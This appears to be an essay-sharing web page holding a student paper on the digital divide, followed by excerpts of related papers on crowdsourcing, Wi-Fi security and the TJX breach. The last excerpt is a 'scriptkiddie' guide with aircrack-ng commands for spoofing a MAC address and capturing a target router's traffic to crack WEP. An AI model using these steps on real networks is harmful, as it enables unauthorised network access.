Free Essay

Wired World

In:

Submitted By mc6376
Words 1023
Pages 5
Wired World Paper
Though we have sunk our teeth really deep into the debilitating impacts of the digital divide problem – not only in Third-World countries, but also in the world at large – it is, however, still an inexhaustible topic. In the course of my research, I identified a couple articles which expounded on the aforementioned problem and how, in some cases, its presence could be indicative of acute negligence on the path of the leadership of some developing societies. The subsequent paragraphs, therefore, delve deep into the distinct, interesting perspectives from the articles gathered from my research.
The first article covers Google’s attempt to bridge the digital divide, particularly in the United States. They also intend to work their way up to the other countries, such as Uganda, where the digital divide problem is supremely exacerbated by misappropriation of national resources and other social issues too. According to Brick, author of ‘Is Google Making the Digital Divide Worse?’, “… [Google] plans to spend $1.5 million this year to support computer science education around the world.” Therefore, it stands to reason that Google is heavily invested in tackling the digital divide problems. As a matter of fact, they envision a future in which “internet access will be a basic human right” (Brick). Thus, the end goal is to provide free WI-FI to developing societies, in Africa, plagued with the digital divide issue. This noble yet arduous undertaking has stirred controversies from citizens of the United States. As stated in the article, “15 percent of American adults have no access to the Internet. Thirty percent lack broadband access at home, with rates lowest among the poor, the elderly and racial minorities.” Hence, these proportions of Americans that are burdened with the digital divide problem are supportive of Google’s initiative but do not approve of its execution. They complain and question why they have to pay for Google’s intervention in this problem, while African countries will receive free WI-FI at no charge. In my own opinion, this is a highly unfair comparison. As we have learned from this week’s lecture and discussions, many of the African countries fraught with the digital divide problem are also characterized by other pressing social problems. This, therefore, makes their inaccessibility to the information grid seem not so urgent, in comparison to the other societal problems such as lack of food, acute poverty and so on. This is why it is an unfair comparison, as said societal problems – that put the lives of citizens in developing countries in jeopardy – do not abound in United States, or are at least at a solid minimum. I do understand that it may seem unfair, as it seem as though Google is giving preferential treatment to such African countries. But Americans, who see Google’s endeavor as unfair, have to understand that such African societies are more in need of help, as they are battling other urgent social issues that put their lives at stake.
The second article I found, in the course of my research, discussed the digital divide problem since the 1990s. It, specifically, highlights the way the definition of the ‘Digital Divide’ has transformed over the years. The definition of the digital divide now stretches beyond ‘who can easily access information?’ to include ‘who creates information?’ The latter, is arguably the more important of the-above-stated questions, and is also at the core of the new definition of the digital divide problem since the early 2000s. I, for one, concur that the question of ‘who creates information’ is an inalienable part of the digital divide problem and is equally as important as furnishing developing societies with ICTs needed for quick access to the GIS. To be candid, many developing nations are more focused on providing internet and other technologies, that the notion of who creates the information that is accessed seems secondary, and perhaps trivial. If you really think about it, the type of information created is directly dictated by the person who is creating said information. A vivid example of this was highlighted in this week’s lecture: “approximately 85% of the web pages on the Internet are in English while one in ten people worldwide understand the English language.” It seems to tally that the predominant language on the net is English, because such web pages were developed by speakers of English for speakers of English. And though it might seem selfish, but it makes sense as the invention of computers, and consequently the internet were first witnessed in an English-speaking country. Therefore, if the digital divide problem was to be completely tackled from all angles, the governments of (severely) affected societies should ensure that the development of web content in the local dialects is encouraged. Plans should be put in place to train local citizens to develop web pages and apps that are more pertinent to the local end-users, as opposed to foreign content. This is a plus for the economy of said developing countries, as it allows for the creation of jobs—and by extension creation of revenue.
The last article, garnered from my research, talks about the diffusion of the internet and the countries that have been left behind, owing to the digital divide problem. According Qureshi, “there is growth by a factor of 3.4 between businesses in a typical developing country which uses ICT and those that do not.” This basically shows how supremely important it is for any country to invest heavily in augmenting its internet and technological facilities. Many third-world countries are behind in terms of ICT facilities in comparison to the first-world counterparts. And thus, they seem incredibly behind and left out of the technological race.

Works Cited
Brick, M. (2014). IS GOOGLE MAKING THE DIGITAL DIVIDE WORSE?. Newsweek Global, 162(8), 28-39.
Modarres, A. (2011). Beyond the digital divide. National Civic Review, 100(3), 4-7. doi:10.1002/ncr.20069.
Qureshi, S. (2012). As the global digital divide narrows, who is being left behind?. Information Technology For Development,18(4), 277-280. doi:10.1080/02681102.2012.730656.
TeKippe S. Wired World.

Similar Documents

Free Essay

Avoid the Crowd

...Avoid the crowd. One of the myriad job requirements incumbent upon creatives is staying atop the latest trends and newest technologies. The longer I’ve been around and designing/writing – I’m a fresh-faced 32, full disclosure – the more I’ve realized that this requirement also comes with a corollary: Just because you can do something, it doesn’t mean you should do something. In other words, not every tactic that’s out there is either worth it or right for everyone (or anyone). Today’s tactic du jour that I hope to never hear about again: Crowdsourcing. Before we go any further, I want to say what crowdsourcing is not. Crowdsourcing is not a blanket term used to define the many ways companies are able to actively and appropriately engage with their customers. Asking folks who own your product to submit videos about the unique ways in which they use it is not crowdsourcing. Nor is asking them to take “action shots” of your product in use that they would, in turn, post on their company blog. Just two of the many healthy ways companies interact with their customers, to say nothing of using social media outlets like Facebook or Twitter to start a conversation. For our purposes, I’ll narrow down what crowdsourcing is to this: Asking people to compete against each other to produce significant branding collateral for only the promise of pay to the ultimate winner. Here’s how it works: Let’s say, for instance, a company needs a new logo. That company turns to the “crowd” – you, me and...

Words: 1534 - Pages: 7

Premium Essay

Innovation

...1. How would you define crowd sourcing? Crowd sourcing is the application of the open source idea to any field outside of software, taking a function performed by people within the organization, such as reporting done by journalist. 2. Why does crowd sourcing require a large, "undefined community" to work? Why not a small, defined community of passionate people who you know and have worked with before or with whom you are already friends (think Face book communities which are smaller, and defined)? Crowd sourcing require a large undefined community because it is said to be more accurate and concise. Large aggregates produce better estimates and judgments than smaller groups. Decisions come from diverse backgrounds. Wisdom of the crowd is another type of crowdsourcing that collects large amounts of information and aggregates it to gain a complete and accurate picture of a topic, based on the idea that a group of people is often more intelligent than an individual. This idea of collective intelligence proves particularly effective on the web because people can contribute in real-time within the same forums from very diverse backgrounds 3. Can you think of other examples of crowd sourcing besides photography? Is photography a good example? What kinds of products or services might not lend themselves to crowd sourcing? Mobs, herds and runaway stock markets produce bad decisions from crowdsourcing. 4. What is the impact of crowd sourcing on business? Can...

Words: 363 - Pages: 2

Free Essay

Wifi Encryption

...Term Paper Christopher Talbott American Public University System Wireless Networks and their Security Risks This purpose of this paper is to discuss the current state of Wireless networks. Their different security features and known issues with wireless technology. As well as how business implement Wireless networks, the different hacking methods used against Wireless networks and its future technological uses. There are many different wireless standards ranging from 802.11b to the new 802.11ac standard. Many manufactures exist with their own unique features for both home and business use. Each Wireless network standard was set forth an agreed upon by the IEEE or Institute of Electrical and Electronics Engineers. “IEEE is the world's largest professional association dedicated to advancing technological innovation and excellence for the benefit of humanity. IEEE and its members inspire a global community through IEEE's highly cited publications, conferences, technology standards, and professional and educational activities, ("About IEEE," 2014)”. The IEEE sets forth the standards for each 802.11 standard, starting with 802.11b, which is a “Wireless radio-frequency local area network. 802.11b, adopted Sept. 1999, operates at 11 Mbps in 2.4GHz band. By end of 2000, IEEE to approve backward-compatible 22 Mbps version of 802.11b HR, to be dubbed 802.11b HRb, (Palenchar, J. (2000)”. 802.11b was the first widely adopted Wireless network for home use. Routers and wireless cards...

Words: 1929 - Pages: 8

Free Essay

The Difference Between Cracking a Wep and a Wpa Network Passkey and How to Protect Yourself from It

...vulnerabilities to help you stay protected from them. Wired Equivalent Protocol (WEP) was the original wireless security protocol. WEP was flawed in numerous ways and hackers were able to get information in minutes. WPAv1 was then introduced as an interim replacement because WEP was that flawed. WPAv1 was made to improve on the secure wireless networks and also used a newer and more improved algorithm. When WPAv2 was finally released, many devices began to be created to be compatible with the AES algorithm WPAv2 uses. There still have not been any major hacks or attacks on a WPAv2-AES network that would cause the Wi-Fi alliance look into using another algorithm a replacement. WPAv1 is too easy to hack so it is not recommended and WPAv1 is now susceptible to multiple types of attacks. There are several different ways you can help to protect yourself and your information. Verify your spam in your e-mail to make sure a file accidentally was not forwarded to spam. There are also others to improve your security. The length of your passkey is very important in security, as well as keeping an up-to-date anti-virus and staying up-to-date on all the latest hacks, cracks, and technology are critical for your protection. N. Justin Bernard Network Security Term Paper November 13, 2012 The difference between cracking a WEP and a WPA network passkey and how to protect yourself from it In today’s always evolving and improving technology world, there are always loopholes, weaknesses, and gaps...

Words: 3607 - Pages: 15

Free Essay

Essay

...NGN 110 – Recitation 11- Group 04 COE Lab Report Ammar Mahmoud b00059988 Dona Praveena g00060450 Lamis Kayyaal g00060188 Majd Alkhatib b00059274 Shakil Khan b00058548 Mr. Naveed Nawaz Monday, November 10, 2014 Table of Contents Introduction………………………………………………………… 03 Question responses …………………………………………………04 Conclusions………………………………………………………… 06 Introduction Computer Engineering (COE) is the practice of designing, developing and building computers. It incorporates ideas from its own field and several other engineering fields to construct fast compact and efficient computer systems. COE's main concentrations include cyber security, artificial intelligence and networking. In the COE lab, three applications of COE were demonstrated:         The first one was a video showing the control of electric train collision, where an FPGA (Field Programmable Gate Array) system was used to avoid collision between two trains that had a common track. Switches controlled by sensors (which detect the position of the trains on the tracks) were used to stop a train while the other train moved through the common track.         In the second demonstration, an FPGA based camera module was used to stream live video. A camera was used to capture data which the FPGA then converted into RGB (Red, Green and Blue) format for viewing on an LCD monitor via a VGA port.         In the third demonstration, an EA Series Router was configured to its basic settings using a PC after which the...

Words: 929 - Pages: 4

Free Essay

Rbc Cooper

...networks to transmit data throughout the stores main computers and for credit card approval.   The wireless data is in the air and leaks out beyond the store’s walls.   TJX used an encryption code that was developed just as retailers began going wireless.   Wired Equivalent Privacy or WEP is a wireless encryption code developed in 1999 that retailers began to implement.   Within a couple of years hackers broke the encryption code and rendered WEP obsolete.   Many retailers In January of 2007 the parent company of TJMaxx and Marshalls known as TJX reported an IT security breach.   The intrusion involved the portion of its network that handles credit card, debit card, check, and merchandise return functions.   Facts slowly began to emerge that roughly 94 million customers’ credit card numbers were stolen from TJMaxx and Marshalls throughout 2006.   It was believed that hackers sat in the parking lots and infiltrated TJX using their wireless network. Most retailers use wireless networks to transmit data throughout the stores main computers and for credit card approval.   The wireless data is in the air and leaks out beyond the store’s walls.   TJX used an encryption code that was developed just as retailers began going wireless.   Wired Equivalent Privacy or WEP is a wireless encryption code developed in 1999 that retailers began to implement.   Within a couple...

Words: 314 - Pages: 2

Premium Essay

Check Point at Tjx Company

...Check point TJX Company IT/205 MAY 24, 2012 Check point TJX Company Information security means protecting information systems from unauthorized access. To my understanding TJX failed to properly encrypt data on many of the employee computers that were using the wireless network, and did not have an effective firewall installed. In the reading it indicated that TJX was still using the old Wired Equivalent Privacy (WEP) encryption system, which is relatively easy for hackers to crack. The Wi-Fi equivalent privacy (WEP) was considered old, weak and ineffective, therefore I could say the security breach that TJX had experience was a resulted by using a cheap and inexpensive wireless Wi-Fi network like the Wired Equivalent Privacy (WEP) encryption system, which make it easy for hackers to navigate. This is why it is important that TJX should have invested in using the wireless Wi-Fi Protective access 2 (WPA2) The Wi-Fi Protected Access 2 (WPA2) standard in conjunction with a sophisticated encryption system could have been used to replace the WEP. In that situation an effective firewall would have prevent unauthorized users from accessing private networks, meaning firewall acts like a gatekeeper who examines each user’s credentials before access is granted to a network. An effective Firewall could have reduced the ability for hackers to gain access to sensitive information. A data security breach could result a variety of issues some of them could be loosing of confidence...

Words: 436 - Pages: 2

Free Essay

Get Rich or Die Tryin

...Get Rich or Die Tryin Albert Gonzalez was a cunning career cybercriminal who once worked on both sides of the law. At one point in his criminal career he actually worked with secret service agents to help take down another hacking ring of several hackers. But Gonzales soon returned to his criminal roots soon after the sting where he would begin to hack into major corporation’s networks in order to steal credit card information. One of these corporations just happened to be TJX. The TJX network was not secure enough from the start. The company was using inadequate wireless security protocols. They used WEP security (wired equivalent privacy) which is easy to crack and a good hacker could break into this type of network security really fast. A hacker with a laptop could simply sit outside the store and break into the network in less than a minute. TJX should have been using the much stronger wireless security protocol WPA (WI-FI Protected Access Protocol). TJX also stored card data improperly. They stored credit card information such as pin codes and cvc codes which are on the back of most credit cards. PCI Data security standards states that sensitive data such as the PIN and CVC codes should not be stored. So the company broke protocol by storing this information. Even though a network breach occurred, this vital card information may have not been exposed if it wasn’t stored on the company network. Finally, the stored data was not encrypted. Another PDI protocol was broken by...

Words: 396 - Pages: 2

Free Essay

It 234 Unit 7

...attacking in this manner it is an ethical hack. Black box testing is when the attack has no knowledge of the internal workings of the system. This type of testing would be done in a penetration test. A gray test the attacker has some knowledge of the system they are trying to access. White box testing is when attacker has full knowledge of the system they are trying to gain access to. White box testing would be more of a vulnerability test. With both types of test being performed it will increase your chances of keeping your network safe. One type of testing would be ok but you would leave yourself open for either a long term or short term problem depending on which method is chosen. (Berkeley, 2014) Question 7-2 WEP stands for Wired Equivalent Privacy. This is a security protocol that is specified in the IEEE Wireless Fidelity standard. It adds security to a wireless local area network that is similar to the security a...

Words: 999 - Pages: 4

Free Essay

Fgdg

... What you will learn  General overview of 802.11  Authentication Methods ▪ WEP ▪ Overview ▪ Key Hierarchy ▪ Encryption/Decryption ▪ WPA ▪ Overview ▪ Key Hierarchy ▪ Encryption/Decryption ▪ WPA2 ▪ Overview ▪ Encryption/Decryption   Summary Question and Answer  Defense Strategies  Monitoring In order to cover the largest amount of information we are going to have make some assumptions:  You have a general understanding of the TCP/IP protocol suite ▪ Primarily layers 2 – 3  You have a general understanding of protocol basics  You have a general understanding of how Radio Frequency (RF) works    Borne out of the IEEE 802 LAN/MAN Standards Committee (LMSC) Part11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications standard Drop in replacement for Ethernet (802.3)  Upper layer protocols should be none the wiser  This seamless integration comes at a stiff price – under the hood complexity  DSSS  Direct Sequence Spread Spectrum  2.4GHz ISM Band ▪ Industrial / Instrumentation, Scientific, Medical (ISM) ▪ 2.400GHz – 2.4835GHz ▪ 14 channels or frequency divisions ▪ 1 – 11 used in the United States  1000mW power maximum ▪ Most devices are 30mW – 100mW  CSMA/CA  LBT (Listen Before Talk)  Exponential back off and retry  Collision avoidance via physical carrier sense and Network Allocation Vector ▪ Network Allocation Vector (NAV) ▪ Virtual Carrier Sense ▪...

Words: 2922 - Pages: 12

Free Essay

Checkpoint: Tjx Companies

...Tonisha Miller IT/205 Jennifer Gilmore CheckPoint: TJX Companies The old Wired Equivalent Privacy (WEP) encryption system was the security controls in place. A Wired Equivalent Privacy (WEP) is not very effective. WEP is built into all standard 802.11 products, but its use is optional. Many users neglect to use WEP security features, leaving them unprotected. The basic WEP specification calls for an access point and all of its users to share the same 40-bit encrypted password, which can be easily decrypted by hackers from a small amount of traffic. Stronger encryption and authentication systems are now available, but users must be willing to install them. TJX had also neglected to install firewalls and data encryption on many of the computers using the wireless network, and didn’t properly install another layer of security software it had purchased. TJX acknowledged in a Securities and Exchange Commission filing that it transmitted credit card data to banks without encryption, violating credit card company guidelines. TJX also retained cardholder data in its systems much longer than stipulated by industry rules for storing such data. The tools and technologies that could have been used to fix the weaknesses are some of the following: General controls govern the design, security, and use of computer programs and the security of data files in general throughout the organization’s information technology infrastructure. On the whole, general controls apply to all computerized...

Words: 753 - Pages: 4

Premium Essay

Sec435 Week 5 Discussion 1 - Wireless Penetration

...Week 5 Discussion 1 "Wireless Penetration" Please respond to the following: Describe in detail the steps involved in cracking WEP encryption. Discuss the implications of relying on such a legacy protocol today and how essential it is for the IT industry to keep current with technology. Explain how to conduct a man-in-the-middle attack between a client (user’s computer) and their access point (AP). Discuss two trust issues which revolve around any type of wireless (i.e. Wi-Fi, WLAN, 3G, Bluetooth) communication. Wep is the basic security encryption mechanism. WEP is weakened by the use of a 24 bit initialization vector (IV) that is reused in a short period of time, thus rendering WEP vulnerable to attack by several readily available cracking tools. One of the challenges of wireless traffic analysis is the ability to inspect the contents of encrypted data frames. Now wireshark has the ability to decode many different network layer and higher protocols, encrypted traffic limits the ability to analyze packets and troubleshoot network problems. Wireshark offers some options to analyze WEP encrypted data. Wireshark offers some options to analyze WEP encrypted data. When configured with the correct WEP key, Wireshark can automatically decrypt WEP encrypted data. When and dissect the plaintext contents of these frames. This allows the administrator to use display filters, coloring rules and other Wireshark features on the decrypted frame contents. In this day in age WEP...

Words: 491 - Pages: 2

Free Essay

Video Summary 7

...Video Summary 7 5_04- FILE SHARING AND PERMISSIONS, 5_06-WIRELESS SECURITY AND 5_07-MALWARE 5_04-FILE SHARING AND PERMISSIONS * Click start * Click on my documents * Right click on Projects * Click on tools * Click on View * Click on Use simple file sharing (recommended) * Then click OK * Right click on Projects * Click on Sharing and Security * To share this folder with other users of this computer only, drag it to the Shared Document folder * Click on Customize * Click on tools * Click on Folder Options * Click on Use simple file sharing * Click OK * Click on Projects again * Click on share the folder * Change user limits PERMISSIONS * Share permissions * NTFS permissions * Click on permissions under User limits * Click on Everyone * Limit the permission for everyone * Click on security for special permission ie; Administrator * Specific permissions are covered on Security + test and Network + test * Deny overrides on all other permissions * Click on advanced in Security * Click on permissions * Inheritance means child objects inherit permissions of parent * Permissions are inherited * Click on start * Right click on My documents * Click on Manage * Click on Shared Folders * Click on Shares * Click on projects * Administrative shares are visible only to administrators On this Video Slide I pretty much learned how to Share...

Words: 831 - Pages: 4

Premium Essay

Wireless Tutorial

...Wireless Hacking – Haifux Wireless Hacking Edri Guy Mar 04 ,2013 See-Security Mar 04 2013 – Wireless Hacking - Haifux Wireless Hacking – Haifux DISCLAIMER 1 – The following discussion is for informational and education purpose only. 2 – Hacking into private network without the written permission from the owner is Illegal and strictly forbidden. 3 – Misused could result in breaking the law so use it at your own risk. See-Security Mar 04 2013 – Wireless Hacking - Haifux Wireless Hacking – Haifux Introduction WiFi Classes Vulnerabilities Attack Overview ● We're going to learn how WiFi (802.11) works ● Start with terminology ● Types ● Vulnerabilities ● Attacking them ● Surprise demonstration of....:) See-Security Mar 04 2013 – Wireless Hacking - Haifux Wireless Hacking – Haifux Introduction WiFi Classes Vulnerabilities Attack Terminology ● ● AP - Access Point MAC – Media Access Control a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a) See-Security Mar 04 2013 – Wireless Hacking - Haifux Wireless Hacking – Haifux Introduction WiFi Classes Vulnerabilities Attack Terminology ● ● BSSID – Access Point's MAC Address ESSID - Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name,But Airodump-ng can guess it. See-Security Mar 04 2013 – Wireless...

Words: 2941 - Pages: 12

Free Essay

Wep Cracking Steps

...Basic steps to get you cracking WEP (for scriptkiddies) Once you got your tools ready it is time to get cracking. Routers especially those given out by our local ISP have their default security settings set to WEP to encrypt their traffic. This can be easily cracked by aircrack-ng suite in about 5 min once you are “au fait” with the setup. For those who want to jump straight into the cracking process here are the basic steps you need to take. Step 0: Spoof MAC address Open terminal and run the command: sudo ifconfig < attacker’s wlan interface > hw ether Step 1: Gather essential background data about yourself and your target. target_router SSID -> target_router target_router MAC address -> 00:14:7F:99:EB:99 target router channel-> 6 attacker’s MAC address -> 00:0f:b5:ff:ff:f9 attacker’s wlan interface: wlan0 attacker’s monitoring interface name (spawned from wlan0): mon0 Note: Replace the above variables with your own. These were mine for my setup. Step 2: Using aircrack-ng suite to crack WEP. sudo airmon-ng start wlan0 -> spawn a monitoring interface from wlan0. sudo airodump-ng mon0 -> survey / scan for your target router. sudo airmon-ng stop mon0 -> stop the monitoring interface so that you can start it again to listen on channel 6. sudo airmon-ng start wlan0 6 -> This starts the mon0 interface listening to only channel 6 [Important step!]. sudo airodump-ng -c6 -w outputfile mon0 -> pump output to a file called outputfile-01...

Words: 363 - Pages: 2